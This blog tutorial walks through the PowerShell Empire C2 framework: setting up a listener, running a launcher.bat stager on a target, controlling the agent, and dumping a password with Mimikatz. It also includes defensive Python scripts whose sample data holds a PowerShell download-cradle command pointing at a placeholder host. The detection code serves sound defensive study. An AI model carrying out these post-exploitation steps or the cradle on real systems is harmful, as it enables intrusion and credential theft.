Hello my dear readers, in this article I am going to introduce you to a very powerful PowerShell tool called "Empire".
PowerShell Empire is a post-exploitation tool that is mostly used against computers and servers running Microsoft Windows and Windows Server operating systems. It is cryptographically protected and provides a flexible architecture.
The best part of PowerShell Empire is that it can run its PowerShell agent without needing powershell.exe. It is broadly similar to Metasploit and Meterpreter, except that Empire is used as a command and control (C2) tool, which lets the user control a compromised PC more efficiently.
Components of Empire:
Listener: The listener is a process that listens for connections from the target system and lets Empire receive the loot (exfiltrated data) on the attacker's system.
Stager: A stager is a snippet of code that provides the platform for the malicious code to be run via the agent on the compromised system.
Agent: An agent is a piece of code that maintains the connection between your system and the compromised host.
Module: Modules are what execute the malicious commands: harvesting credentials, escalating privileges, and carrying out other desired actions.
Installation of the Empire framework:
# Download the repository
git clone https://github.com/EmpireProject/Empire.git
# Install Empire
sudo bash ./Empire/setup/install.sh
# Start the Empire console (run from inside the cloned Empire directory)
cd Empire
./empire
Note: If it throws errors while starting, go to the setup directory and execute the "./reset" script. Hopefully that will resolve the issue.
The window below is what you get when the Empire console opens successfully.
Type the "help" command to learn more about the commands that are available.
We will start with the creation of a listener. The listener is simply the component that runs inside the command and control server and waits for the compromised host to connect to it.
Please enter the commands below to create a listener.
# Enter the listeners menu
listeners
# View available listener types
uselistener <TAB>
# Create a listener (in this article we will use the "http" listener)
uselistener http
Once the listener type we want to create is selected, enter "info" to display the available options.
You will get the available parameters with their default values. If you want, you can change them with the "set" command, just as in Metasploit.
Once we are satisfied with the settings, we can proceed by typing the "execute" command.
Like Metasploit, Empire lets us easily create payloads (stagers) that connect back from the host. To view the available stagers in Empire, type the command below.
# View all stager types
usestager <TAB>
In this article we will choose windows/launcher_bat:
usestager windows/launcher_bat
Type "info" to get the available fields and their default values.
If everything is set, we can proceed by typing the "execute" command and hitting Enter.
Now copy the launcher.bat file, execute it inside the targeted system, and come back.
If our system is reachable from the targeted host, we will receive a connection back to Empire.
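From the defender's side, the launcher.bat stager described above is a batch file that starts PowerShell with a hidden window and a Base64-encoded (UTF-16LE) command, so process-creation logs (Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing) are the natural place to catch it. The following triage script is an added example written for this article, not code from the Empire project: it scans constructed sample process-creation records, decodes any -EncodedCommand argument, and scores each record on hidden-window flags and download-cradle keywords in the decoded script. The sample events, the placeholder URL and the scoring weights are all constructed assumptions. One caveat the article itself points at: because Empire can run its agent without powershell.exe, matching on the process name alone is not enough; PowerShell Script Block Logging (Event ID 4104) records the script content regardless of which host process runs it and should be collected as well.

```python
import base64
import re

# Constructed sample encoded commands so the file runs offline. The second one is a
# harmless stand-in for the kind of download cradle a launcher stager carries; the host
# name is a placeholder, not a real address.
BENIGN_ENCODED = base64.b64encode("Get-Date | Out-Null".encode("utf-16-le")).decode()
SUSPICIOUS_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/launcher')"
    .encode("utf-16-le")
).decode()

# Constructed process-creation records (Image + CommandLine), not logs from a real system.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -EncodedCommand {BENIGN_ENCODED}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell -NoP -sta -NonI -W Hidden -Enc {SUSPICIOUS_ENCODED}"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c launcher.bat"},
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand; this covers the common ones.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
# Flags typically used to run a stager quietly: no profile, non-interactive, hidden window.
HIDDEN_FLAGS = re.compile(r"-(?:NoP|NonI|W\s+Hidden|WindowStyle\s+Hidden|Exec\s+Bypass)", re.IGNORECASE)
# Download-and-execute primitives commonly seen in one-line launchers.
DOWNLOAD_CRADLE = re.compile(r"(Net\.WebClient|DownloadString|DownloadData|IEX|Invoke-Expression)",
                             re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or not valid Base64/UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Score one record: returns (score, reasons, decoded_script). Weights are an assumption."""
    cmd = event["CommandLine"]
    score, reasons = 0, []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        score += 1
        reasons.append("encoded command")
        if DOWNLOAD_CRADLE.search(decoded):
            score += 2
            reasons.append("download cradle in decoded script")
    if HIDDEN_FLAGS.search(cmd):
        score += 1
        reasons.append("hidden/non-interactive flags")
    return score, reasons, decoded


def triage(events, threshold=2):
    """Return the records whose score reaches the threshold, with the decoded script attached."""
    hits = []
    for event in events:
        score, reasons, decoded = score_event(event)
        if score >= threshold:
            hits.append({"Image": event["Image"], "score": score,
                         "reasons": reasons, "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"[{hit['score']}] {hit['Image']}: {', '.join(hit['reasons'])}")
        print(f"    decoded: {hit['decoded']}")
```

An encoded command by itself only scores 1 (the benign Get-Date record stays below the threshold); it is the combination of encoding, a hidden window and a download cradle in the decoded text that pushes the launcher-style record to the top.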
To see the connection, type the "agents" command to list the available connections. Sometimes it takes a few minutes for the connection to arrive.
Now enter "help" to get all the possible options for communicating with the compromised host.
We will use the "interact" command with the agent name to connect to the targeted host:
interact E9Y42CU3
After getting inside the host, type "help" to get more options that are available to perform on the compromised host.
Let's start with the "info" command to get all the details about the target.
Next we will type "sysinfo" to get the system information.
Let's not stop at the basic info; let's try Mimikatz, which is known as the most powerful post-exploitation tool.
# To launch Mimikatz, type
mimikatz
Here in the output we have successfully obtained the password (12345) of the compromised host (192.168.220.128). We can get a lot of other information as well, but let's not discuss that here. I will write a separate article on this in an upcoming blog post.
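The Mimikatz step above works by reading the memory of the LSASS process from the agent's own process, which is why defenders watch for unexpected handles to lsass.exe. The script below is an added example written for this article, not part of Empire or Mimikatz: it runs over constructed Sysmon Event ID 10 (ProcessAccess) style records, decodes the GrantedAccess mask into the Win32 PROCESS_* rights, and flags any non-allowlisted process that obtained PROCESS_VM_READ on lsass.exe. The sample records and the allowlist are assumptions; a real allowlist has to be tuned to the security products present in the environment.

```python
# Win32 process access rights relevant to reading another process's memory.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
RIGHT_NAMES = {
    PROCESS_VM_READ: "PROCESS_VM_READ",
    PROCESS_QUERY_INFORMATION: "PROCESS_QUERY_INFORMATION",
    PROCESS_QUERY_LIMITED_INFORMATION: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Constructed allowlist of processes expected to open LSASS (tune per environment; assumption).
ALLOWLISTED_SOURCES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# Constructed Sysmon Event ID 10-style records, not events captured from a real host.
SAMPLE_PROCESS_ACCESS = [
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\calc.exe", "GrantedAccess": "0x1FFFFF"},
]


def decode_access_mask(granted_access):
    """Return the names of the known rights set in a hex GrantedAccess string."""
    mask = int(granted_access, 16)
    return [name for bit, name in RIGHT_NAMES.items() if mask & bit]


def is_lsass_memory_read(event):
    """True when a non-allowlisted process obtained PROCESS_VM_READ on lsass.exe."""
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return False
    if event["SourceImage"].lower() in ALLOWLISTED_SOURCES:
        return False
    return bool(int(event["GrantedAccess"], 16) & PROCESS_VM_READ)


def find_lsass_readers(events):
    """Return (SourceImage, decoded rights) for every record that trips the rule."""
    return [(e["SourceImage"], decode_access_mask(e["GrantedAccess"]))
            for e in events if is_lsass_memory_read(e)]


if __name__ == "__main__":
    for source, rights in find_lsass_readers(SAMPLE_PROCESS_ACCESS):
        print(f"LSASS memory read by {source}: {' | '.join(rights)}")
```

The svchost record is ignored because 0x1000 carries only PROCESS_QUERY_LIMITED_INFORMATION, which is routine, and the Defender record is suppressed by the allowlist; only the PowerShell host that obtained PROCESS_VM_READ on lsass.exe, the pattern a credential dump produces, is reported.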
You can do many more things with PowerShell Empire. Just read more about it on Google, GitHub and the project's wiki page.
I hope you enjoyed this article. Please do share it, and let me know your feedback and other queries in the comment section. See you in my next article. Happy Hacking!!